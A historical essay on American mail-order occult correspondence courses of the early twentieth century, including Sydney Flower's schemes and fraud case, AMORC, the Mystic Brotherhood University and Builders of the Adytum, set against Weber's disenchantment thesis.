![Two profile portraits of mustached men face each other, one labeled 'desire retained' drawing arrows inward, the other 'desire released' scattering arrows outward.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/01-personal-magnetism.jpg?width=1200&height=765)

“Force accumulated always attracts, force released is wasted and neutralized”, diagram from *A Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of the mail-order “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=19).

In the early twentieth century, after the rationalising forces of the Enlightenment had supposedly recast spiritual life through reason, curious advertisements began to appear in popular periodicals ranging from *Popular Mechanics* to *Weird Tales*, offering arcane occult knowledge sent directly to the reader’s door. Typical of their genre, a 1902 notice in the *Chicago Tribune* introduced the De Laurence Institute of Hypnotism, which promised to “\[unfold] the mysterious law of all personal magnetism, occult force, and influence”, while, elsewhere, the *Occult Digest* announced the services of the Los Angeles–based Brotherhood of Light, who had on offer “correspondence courses in all branches of occult science” by return of post.[1](#fn1) Sending away for the secrets of the ages was, it seemed, disarmingly simple, part and parcel of the colossal mail-order industry that had emerged during the Second Industrial Revolution of the late-nineteenth and early twentieth centuries.

The rise of mail-order magic was, in many ways, both an upshot and a parody of modernity. America’s long nineteenth century had already seen its fair share of religious transformation, with movements like Mormonism, Seventh-day Adventism, Christian Science, and the Shakers, among others, emerging from the spiritual fervour of the Second Great Awakening, each grappling in their own way with the relationship between the individual and society at large. In 1917, German sociologist Max Weber famously argued that “the fate of our times is characterized by rationalization and intellectualization and, above all, by the ‘disenchantment of the world’”.[2](#fn2) To Weber’s mind, the progress of the modern world had eradicated the need for spiritual practice, with the purposes it had once held now being carried by the cold logics of bureaucracy, science, and instrumental reason. From the vantage point of hindsight, however, Weber’s *Entzauberung* thesis seems less terminal than he had imagined.

In a time increasingly shaped by Taylorist factories and scientific materialism, Weber ultimately misread modernity, and his account of disenchantment confused modernity’s growing spiritual liberalism with large-scale secularisation. That is, Weber believed that the declining adherence to Christianity (which was unmistakable) signalled that the numinous had faded from modern life (which couldn’t have been further from the truth). Modernity and scientific materialism didn’t really get rid of spiritual practice as much as abstract it from an inherited, communal framework. What modernity had in fact created was a radical redistribution of belief, in which the rationalist currents presumed to have extinguished faith in powers and presences beyond oneself became the very means by which one could learn about these otherworldly forces from the privacy of one’s own home.

![A book cover titled 'Catalogue: Occult And Spiritual Books' from The de Laurence Co., Chicago, featuring Egyptian imagery and a colorful downward-pointing triangle.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/02-delaurence-cover-edit.jpg?width=1200&height=765)

Cover of an occult and spiritual books catalogue published by L. W. de Laurence’s mail-order company, 1931 — [Source](https://commons.wikimedia.org/wiki/File:Cover_of_catalogue_published_by_L._W._de_Laurence%E2%80%99s_mail-order_company.jpg).

![Advertisement for 'Temple Incense' showing a woman with flowing hair between two candles, smoke rising from a round vessel below her.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/03-delaurence-temple-incense-p-edit.jpg?width=1200&height=765)

Advertisement for “temple incense” sold by L. W. de Laurence’s mail-order company, 1931 — [Source](https://commons.wikimedia.org/wiki/File:De_Laurence_temple_incense.jpg).

The new material conditions of postal exchange — linotype machines, cheap pulp paper, and rapidly improving and expanding delivery networks — made the recondite world of the occult available with unprecedented targeting and at a scale never before seen. The consumer now got to choose if they wanted to practice meditation, astrology, tarot, Mesmerism, Kabbalah, Rosicrucianism, something even more arcane, or a unique combination of them all. There was no fixed template for how the instruction unfolded, but most would-be adherents began their affiliation by responding to the offer of a free sample lesson or catalogue from a magazine ad. From there, they could subscribe to courses whose scale, duration, and cost varied greatly. To give just a single example, lessons from Psychiana, one of the largest esoteric correspondence schools of the 1930s by subscriber numbers, cost around $1 each (about $20 in today’s currency) and were purchased in groups of ten or twenty, with one lesson posted weekly. For students of Psychiana, as well as those who sent away to the many other smaller providers, completion of these introductory sequences usually opened onto further tiers of instruction or advanced courses, with payment typically remitted in cash, sometimes in instalments or in arrears.

One of mail-order magic’s early innovators was Sydney Flower, the shadowy Chicago-based publisher behind *The Hypnotic Magazine*, *The Yogi*, and *New Thought* (the latter co-edited with William Walker Atkinson, best known as the presumed author of 1908’s *Kybalion*), as well as a startling range of orderable courses, through his Psychic Research Company and Magnetic Publishing Company, with titles such as *A Course of Instruction in Magnetic Healing in Five Parts* and *A Course of Instruction in the Development of Power through Clairvoyance*.

![Green book cover titled 'Personal Magnetism, The First Part in Series B,' published by The Psychic Research Co., Chicago and London.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/04-personal-magnetism-cover.jpg?width=1200&height=765)

Cover of the mail-order *Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=3).

![Green book cover for 'Magnetic Healing, The Fourth Part in Series B,' listing other titles in the series, published by The Psychic Research Co.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/05-magnetic-healing-cover.jpg?width=1200&height=765)

Cover of the mail-order *A Course of Instruction in Magnetic Healing*, the fourth part of “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=219).

![Two printed testimonial letters from readers praising a mail-order course, titled 'Beautiful Lessons, Long Wished For' and 'Personal Magnetism Alone Worth 20s.'](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/06-c1903__research_publishing_co___samples_of_letters_received-detail.jpg?width=1200&height=765)

Advertising testimonials from students supposedly pleased with the mail-order “Series ‘B’” courses offered by Sydney Flower’s Psychic Research Company — [Source](https://iapsop.com/archive/materials/wing_lessons/c1903__research_publishing_co___samples_of_letters_received.pdf): IAPSOP (CC BY-NC).

Flower emerges with almost no trace of a past, but by the time he arrived in Chicago at the turn of the century — where he would collaborate with Herbert Parkyn at the Chicago School of Psychology — America’s so-called second city had become the country’s undisputed hub of metaphysics and personal development, a cosmopolitan crossroads still reverberating with the hum of the 1893 World’s Parliament of Religions and the awe-inspiring appearances of Eastern gurus and spiritual teachers like Swami Vivekananda. Organised by a Swedenborgian lawyer and Unitarian minister, the Parliament assembled a diverse array of leaders from global religions in a landmark attempt to foster interfaith dialogue and introduce non-Christian traditions to American audiences. Flower quickly recognised that, alongside this lather of spiritual curiosity, Chicago’s industrial infrastructure and well-developed transportation links at the heart of a rapidly expanding country could be exploited for esoteric commerce.

![Seven men seated and standing together, some in turbans and robes and others in dark suits, a raised-arm statue visible behind them.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/07-Swami_Vivekananda_at_Parliament_of_Religions-edit.jpg?width=1200&height=765)

Religious leaders at the 1893 World’s Parliament of Religions. From left to right: Virchand Gandhi, Hewivitarne Dharmapala, Swami Vivekananda, and (possibly) Gaston Bonet-Maury — [Source](https://commons.wikimedia.org/wiki/File:Swami_Vivekananda_at_Parliament_of_Religions.jpg).

In addition to his courses on voguish practices like hypnotism and clairvoyance, Flower’s 1902 course, *The Mail-Order Business*, guided aspiring entrepreneurs in generating success similar to his own. Described here to readers and deployed elsewhere with relish in his own business, his favourite marketing strategy was the dark art of multiplying corporate identities, of creating new imprints, supposed “departments”, and fictive company names in order to project an illusion of institutional scale and influence. A reader encountering the New Thought Publishing Company, Research Publishing Company, or the Penny Classics series could easily assume that these were each independent bodies, rather than the handiwork of Flower and a few hardworking secretaries. Later, Flower employed an agent by the name of T. W. Henry, who ran the same operation from London to serve European customers, although it was the American market that was most rapidly expanding. Flower created, in effect, an early form of what we might now refer to as “market segmentation”, allowing him to speak to several distinct audiences while maintaining a single underlying operation from the Masonic Temple in Chicago.

While none of this was, strictly speaking, illegal, Flower’s experiments with the mail-order business crossed into outright deceit in 1904, when the Post Office Department brought a case against him for fraudulent financial solicitation. Through his magazine *New Thought*, he had been promoting what he called the “Royal Ten”, an investment scheme that promised implausible fifty percent dividends on a ten-dollar investment. When postal inspectors intervened — charging him with using the mails to defraud — Flower had already vanished, resurfacing in the public record only years later when he was arrested in 1910 on separate charges related to financial advice given on gold prospecting.[3](#fn3) Ever the indefatigable entrepreneur, Flower launched a magazine called *The Yogi* while incarcerated and edited eleven issues from his jail cell in Carson City, Nevada.

![Ornate banner letterhead for 'New Thought Publishing Co., Ltd.' featuring a central five-pointed star with a single eye at its centre and floral scrollwork.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/08-c1903__new_thought_publishing_co_ltd___flyer_for_the_power_within-edit.jpg?width=1200&height=765)

Letterhead for London’s New Thought Publishing Company, a mail-order publisher and distributor of scientific, psychic, and self-culture literature that was founded by Sydney Flower — [Source](https://iapsop.com/archive/materials/wing_lessons/c1903__new_thought_publishing_co_ltd___flyer_for_the_power_within.pdf): IAPSOP (CC BY-NC).

![Stock-offer advertisement headed 'Fortune Knocks Once!' showing a large wooden-framed industrial reduction machine above a printed purchase form for North Shore Reduction Company shares.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/09-new_thought_v12_n6_jun_1903-flower-fraud.jpg?width=1200&height=765)

Order form that appeared in a June 1903 issue of *New Thought*, which solicits money in exchange for stock in Sydney Flower’s North Shore Reduction Company. It was this kind of solicitation that would later be deemed fraudulent during his 1904 Post Office Department legal trial — [Source](https://iapsop.com/archive/materials/new_thought_chicago/new_thought_v12_n6_jun_1903.pdf): IAPSOP (CC BY-NC).

![Magazine cover titled 'The Yogi,' Vol. 1 No. 1, July, showing a turbaned figure chin-on-hand amid palm fronds in a bold woodcut style.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/10-the-yogi.jpg?width=1200&height=765)

Cover of the first issue of *The Yogi: A Magazine of Ferment* (July 1910), which Sydney Flower founded while incarcerated — [Source](http://iapsop.com/archive/materials/yogi_flower/): IAPSOP (CC BY-NC).

Mail-order magic was, perhaps inevitably, an industry vulnerable to charlatans, and postal inspectors found themselves repeatedly entangled with peddlers of flimflam and smoke. But it is important to point out that, despite numerous bad actors, many of these occult organisations operated with a certain spiritual earnestness that earned tens of thousands of followers and students. Their prices were typically modest (even within the context of Depression-era economics), their lessons sincere if occasionally uneven, and their promises more aspirational than exploitative. Many of these publishers operated in the same commercial domain that we would today recognise as self-help literature, and some of the most successful correspondence courses, such as Charles Haanel’s *Master Key System*, first circulated in weekly lessons in 1912, can still be found on the shelves of most mid-sized bookshops. Flower had demonstrated how easily spiritual authority could be amplified through the post, but there were also those occult entrepreneurs who moved in more orderly and austere directions, codifying graded lessons into vast curricula that managed to maintain the spiritual legitimacy that Flower himself had never sustained.

Many of these more ambitious occult correspondence courses drew on the dense symbolic vocabulary of Rosicrucianism and Theosophy, weaving it with the new emerging discipline of psychology in a genuine attempt to democratise personal development through spiritual practice. Rosicrucianism (an esoteric philosophy premised on the notion of a secret network of benevolent healers guiding human affairs) and Theosophy (a syncretic spiritual tradition blending Eastern religious ideas with Western mysticism in an attempt to articulate a universal, perennial wisdom) provided a map to this new breed of spiritual teacher for secret societies that balanced rational self-improvement with richly romantic mythologies. In a country that had been, since the earliest days of the Republic, enamoured of the ideals of bootstrapping individualism, these correspondence courses were enticing models of rational self-development animated by the promise of an esoteric thrill. And by the early 1930s, at a time when economic upheaval had left many Americans searching for stability, the authors and organisers of occult correspondence schools were offering a reassuring path toward inward contentment and outward success beyond the confines of the Christian church.

![Promotional booklet cover for 'The Ki-Magi System: The Secret of Power,' showing a robed figure entering a columned Egyptian-style temple, issued by Columbia Scientific Academy.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/11-c1902_columbia_scientific_academy_ki-magi_promotional_materials-cover.jpg?width=1200&height=765)

Cover of *The Ki-Magi System: The Secret of Power,* a mail-order pamphlet published by the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

![Booklet cover titled 'Success and How to Win It' showing a classical woman in flowing robes holding a laurel wreath and cornucopia beside a wheel.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/12-success-and-how-to-win-it.jpg?width=1200&height=765)

Cover of *Success and How to Win It*, a mail-order pamphlet published by the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

![A two-page spread titled 'Authors of Our Course,' presenting ten framed portrait photographs of the course's authors in decorative oval medallions with scrollwork and ribbons.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/13-authors-of-our-course.jpg?width=1200&height=765)

The “ten eminent specialists” who wrote the mail-order courses for the Columbia Scientific Academy, 1901 — [Source](https://iapsop.com/archive/materials/wing_lessons/columbia_scientific_academy/c1902_columbia_scientific_academy_ki-magi_promotional_materials.pdf): IAPSOP (CC BY-NC).

One of the most well-known mail-order occult societies of the time, and one which is still in existence today, was the Ancient Mystical Order Rosae Crucis (AMORC), founded in 1915 by advertising agent Harvey Spencer Lewis. Like Sydney Flower, Lewis initially began publishing mail-order courses on popular late-nineteenth-century practices of hypnotism and mesmerism, in works such as *Four Special Lessons in Personal Influence, Hypnotic Suggestion, and Treatment by Suggestion*. What happened next became the cornerstone of AMORC’s foundation story. Lewis claimed that during a visit to Toulouse in 1909 he was initiated into an unbroken Rosicrucian lineage and subsequently instructed to take the tradition to America, where it could be publicly revealed to the properly prepared. While many new religious movements that emerged from the Second Great Awakening had viewed American society as corrupt, fallen, or doomed — and summarily responded by retreating or separating — Lewis’ AMORC moved in the other direction, presenting itself as the continuing current of the secret Rosicrucian order of restorative mendicants whose job was to remain part of the world and to support its healthy growth. As its own literature explained, “the Order is primarily a humanitarian movement, making for greater health, happiness, and peace in the earthly lives of all mankind.” Members, it clarified, were “unselfish servants of God to mankind, efficiently educated, trained, and experienced, attuned with the mighty forces of the Cosmic or Divine Mind, and masters of matter, space, and time.”[4](#fn4) In spite of his mythologising tendencies and a sometimes grandiose cunning, Lewis promulgated a humanistic mysticism grounded in discipline and ethical responsibility, promising not transcendence beyond the world but mastery and harmony within it.

![Portrait of H. Spencer Lewis in Rosicrucian regalia, wearing a dark robe patterned with crosses, a white star-marked sash, and a large Rose-and-Cross pendant.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/14-occult_digest_v3_n6_jun_1927-edit.jpg?width=1200&height=765)

Harvey Spencer Lewis wearing his “Official Regalia as Imperator of the Rosicrucian Order”, as photographed in a June 1927 issue of *Occult Digest* — [Source](https://iapsop.com/archive/materials/occult_digest/occult_digest_v3_n6_jun_1927.pdf): IAPSOP (CC BY-NC).

![A heavyset mustached man in a three-piece suit sits in a dark chair reading an open book, beside a table lamp with a decorated shade.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/15-H-Spencer-Lewis.jpg?width=1200&height=765)

Photograph of Harvey Spencer Lewis, photographer and date unknown — [Source](https://commons.wikimedia.org/wiki/File:Photograph_of_Harvey_Spencer_Lewis.jpg).

A 1933 advertisement from the Mystic Brotherhood University — a Tampa-based group that had recently splintered from AMORC — suggested a striking fusion of esoteric allure and practical self-help. Its eighteen-page mailer served firstly as a recruitment tool, but also as the initial step toward concrete techniques for navigating everyday life. The cover prominently featured the Rose Cross lamen of a famed nineteenth-century British occult society, the Hermetic Order of the Golden Dawn, while the text claimed sanction from the “Great White Lodge”, an explicit reference to the Theosophical Society’s hierarchy of ascended masters. “This School of Wisdom”, the booklet claimed, “has been ever Cloistered from the World, because it is submissive alone to the Illuminated Government, but from time to time this group of Sages have revealed to the outer World, a pathway, in order to attract man to the great Truths of their Sanctuary.”[5](#fn5) Its lessons often anticipate what would now be described as cognitive-behavioural therapy (CBT) exercises, guiding students to monitor their thoughts, rescript unhelpful patterns, and develop disciplined habits of mindfulness. Long before CBT was codified in the late twentieth century by psychologists such as Aaron Beck and Albert Ellis, occult correspondence courses like these were already drawing — sometimes consciously and sometimes intuitively — on much older traditions of Stoic self-regulation found in Marcus Aurelius’ *Meditations* and the mental discipline advocated by Epictetus. What the Mystic Brotherhood University ultimately offered were therapeutic tools for cultivating moral resolve at a time when many were searching for both practical guidance and transcendental relief.

![Booklet cover titled 'The Mystic Brotherhood University, Tampa, Fla.' in blackletter script, framed by plumes of smoke and featuring a central cross covered with occult symbols.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/16-mystic-brotherhood-cross-edit.jpg?width=1200&height=765)

Cover of a pamphlet from the Mystic Brotherhood University based in Tampa, Florida, which offered occult correspondence courses, ca. 1930s — [Source](https://iapsop.com/exhibits/mystic_brotherhood/): IAPSOP (CC BY-NC).

![Magazine cover for 'The Mystic Messenger,' September 1937, showing two elaborately costumed figures in tall headdresses facing a pedestal with smoke curling between them.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/17-mystic-messenger-edit.jpg?width=1200&height=765)

Cover of an instalment of “The Mystic Messenger”, a monthly mail-order course from the Mystic Brotherhood University in Tampa, Florida, September 1937 — [Source](https://iapsop.com/archive/materials/mystic_messenger/): IAPSOP (CC BY-NC).

Harvey Spencer Lewis had set the model that others would follow, although not all mail-order occult groups claimed, as Lewis had, a direct historical lineage established through initiation (either real or, more often, fancifully imagined). Mediumistic channelling provided the source material for numerous mail-order occult societies, including Maurice Doreal’s Brotherhood of the White Temple. Like Helena Blavatsky before him, Doreal explained that his teachings had been conveyed to him by disincarnate, super-evolved sages (in his case, from Atlantis), who offered a blend of early Gnosticism and Eastern mysticism, all wrapped in the mass-culture idiom of pulp sci-fi. Doreal’s lessons through the post were hugely popular throughout the mid-century, circulating alongside [the era’s taste for speculative fiction and “weird tales”](https://publicdomainreview.org/essay/charles-fort-and-the-book-of-the-damned/) of reptilian humanoids, ancient astronauts, and sinister secret orders, which helped establish the rubric for many later conspiracy theories. In this overlap, we can see how the sublime realms of mail-order magic could, for some readers, harden into the kinds of conspiratorial worldviews that circulated through the pulp culture of the day.

The mail-order occult societies that withstood the test of time were those with the most internally consistent cosmologies, and which either sought to reanimate the prevailing esoteric currents of the seventeenth to nineteenth centuries or, alternatively, moved in the other direction toward psychology and the philosophy of mind. Paul Foster Case’s Builders of the Adytum attempted to do both. It was in Chicago at the turn of the century, the time and place of so many occult conversions, that Case met Sydney Flower’s collaborator and best-selling occult writer William Walker Atkinson, and shortly thereafter joined the Alpha et Omega lodge, a splinter group of the incense-trailed Hermetic Order of the Golden Dawn, where he quickly rose through its degrees. The fact that Case was initiated into an established and deeply influential occult society underscores a broader truth about this milieu: in most other instances, its histories rest less on verifiable lineage than on the fleeting appearance of a half-seen (and presumably fictitious) order that surfaced only long enough to confer legitimacy on the next seeker in line, a fitting reminder of how fragile and fluid spiritual authority could be within the mail-order occult world.

![Blue-gray notebook page headed 'Introduction to Tarot,' filled with handwritten blue-ink study notes on Key 8 Strength and Key 9 Hermit with page-number references.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/18-PaulFosterCase-Bota-IntroductionToTarot-1922_0069.jpg?width=1200&height=765)

Cover (with a reader’s annotations) of the fifth mail-order pamphlet published by Paul Foster Case in the “Introduction to Tarot” series — [Source](https://archive.org/details/PaulFosterCase-Bota-IntroductionToTarot-1922/page/n174/mode/thumb).

![Blue-gray notebook page headed 'Introduction to Tarot,' covered with handwritten blue-ink notes on Key 10 Wheel of Fortune, listing Kaph, ROTA, Hermanubis, and Sphinx.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/19-PaulFosterCase-Bota-IntroductionToTarot-1922_0085.jpg?width=1200&height=765)

Cover (with a reader’s annotations) of the sixth mail-order pamphlet published by Paul Foster Case in the “Introduction to Tarot” series — [Source](https://archive.org/details/PaulFosterCase-Bota-IntroductionToTarot-1922/page/n174/mode/thumb).

In 1922, Case established the School of Ageless Wisdom in Los Angeles, which later evolved into Builders of the Adytum (BOTA), an organisation that remains active today. In contrast to the theatrical and often exaggerated claims of some of his predecessors, Case’s method was one of rigour and discipline, with weekly lessons combining theoretical knowledge of the Kabbalah and tarot with practical exercises in meditation and visualisation, contemplative traditions that were still rare outside of the confines of Christian prayer. Ultimately, BOTA wasn’t teaching the tarot as a method of divination but as a path of self-development with a staunch Protestant work ethic. “You will find yourself developing greater ability to concentrate”, he explains in the opening lesson. “Your perceptions will be keener. You will deepen and broaden your comprehension of yourself, and of the meaning of your various experiences.”[6](#fn6) A central feature of BOTA’s early teaching was the memorisation of what Case termed “The Pattern on the Trestle Board”, or simply “The Pattern”, ten aphoristic statements on spiritual self-reliance and sacred responsibility that functioned for members as both a moral code and a cognitive scaffold to the ten sephiroth on the Kabbalah’s Tree of Life diagram. For BOTA students, there were few grand pronouncements and no conspiratorial tease. What BOTA offered, instead, were philosophically inclined treatments of the ancient mystical tradition of Kabbalah and the more recent but still conceptually ornate practice of tarot, offering influential and authoritative interpretations of both.

One of the defining features of the mail-order occult societies that proliferated in the early twentieth century was their ability to signpost routes through not just economic depression and global war, but through the deeper, subtler affliction of the modern condition itself. In a world increasingly flattened by industrial rationalism and the conveyor belt of routinised labour, mail-order magic offered an undoubtedly seductive counter-current. In his now-classic diagnosis of the malaise of modern American life, *The Culture of Narcissism* (1979), Christopher Lasch argued that “people today hunger not for personal salvation, let alone for the restoration of an earlier golden age, but for the feeling, the momentary illusion, of personal well-being, health, and psychic security.”[7](#fn7) In many ways, mail-order magic anticipated this shift. Esoteric cosmologies and metaphysical systems that had once promised access to occult wisdom were being steadily reframed as tools of Stoic self-regulation, and correspondence courses such as these became one therapeutic tool among many for managing the pressures of modernity at a time when organised mainstream religion was slouching out of view.

![Line drawing of a mustached man in a striped suit with arms raised beneath an arc of words: anger, vanity, appetite, temptation, and impatience.](https://pdr-assets.b-cdn.net/essays/magic-by-return-of-post/20-magnetic-man.jpg?width=1200&height=765)

“The magnetic man welcomes forces that others dread, because he can extract a precious power therefrom”, diagram from *A Course in Personal Magnetism: Self-Control and the Development of Character*, the first part of the mail-order “Series ‘B’”, published by Sydney Flower’s Psychic Research Company in 1901 — [Source](https://wellcomecollection.org/works/ubh8h9wk/items?canvas=27).

What the mail-order mages had ultimately recognised was that the modern man and woman no longer necessarily sought a metaphysics to explain the cosmos and their place within it, but a personal metaphysics that could diagnose themselves through a recognisably American lens of radical subjectivity and self-reliance. What is lost in all this, perhaps, is the seriousness of the quest: the sense that one’s spiritual practice — whether liturgical or magical, devotional or divinatory — isn’t simply a method of self-soothing but a sincere gesture toward a transcendental world that exceeds us. Many of the customers who responded to those magazine ads were in search of genuine transcendence and were offered, instead, a commodified and reproducible illusion of initiation.

The text of this essay is published under a [CC BY-SA](https://creativecommons.org/licenses/by-sa/4.0/) license, see [here](https://publicdomainreview.org/legal#reusing-our-articles) for details.

